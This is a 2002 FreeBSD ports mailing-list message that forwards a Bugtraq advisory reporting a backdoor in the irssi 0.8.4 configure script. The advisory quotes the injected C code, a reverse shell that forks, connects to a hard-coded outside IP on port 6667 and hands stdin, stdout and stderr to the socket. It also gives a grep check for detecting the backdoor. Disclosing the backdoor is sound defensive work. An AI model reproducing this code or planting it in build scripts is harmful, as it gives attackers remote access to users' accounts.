From owner-freebsd-ports  Sat May 25  8:31:13 2002
Delivered-To: freebsd-ports@freebsd.org
Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153])
	by hub.freebsd.org (Postfix) with ESMTP id 468B137B400
	for <ports@FreeBSD.org>; Sat, 25 May 2002 08:31:09 -0700 (PDT)
Received: by gw.nectar.cc (Postfix, from userid 1001)
	id B1A6341; Sat, 25 May 2002 10:31:08 -0500 (CDT)
Date: Sat, 25 May 2002 10:31:08 -0500
From: "Jacques A. Vidrine" <nectar@FreeBSD.org>
To: ports@FreeBSD.org
Subject: Fwd: [irssi backdoored.]
Message-ID: <20020525153108.GA47077@hellblazer.nectar.cc>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
User-Agent: Mutt/1.3.27i
X-Url: http://www.nectar.cc/
Sender: owner-freebsd-ports@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-ports.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-ports>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-ports>
X-Loop: FreeBSD.org

This is why we _must_ always compare updated port distribution files
when the checksum changes.
-- 
Jacques A. Vidrine <n@nectar.cc>                     http://www.nectar.cc/
NTT/Verio SME           .      FreeBSD UNIX      .        Heimdal Kerberos
jvidrine@verio.net      .   nectar@FreeBSD.org   .           nectar@kth.se

----- Forwarded message from Martin Östlund <martin@webtech.se> -----
Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin Östlund <martin@webtech.se>
To: bugtraq@securityfocus.com
Subject: irssi backdoored.

Hi readers.

I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didnt know).

"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):

       int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
 /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6667);
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);

Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."

  - End of quote.

Take care,
Martin Östlund.





----- End forwarded message -----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message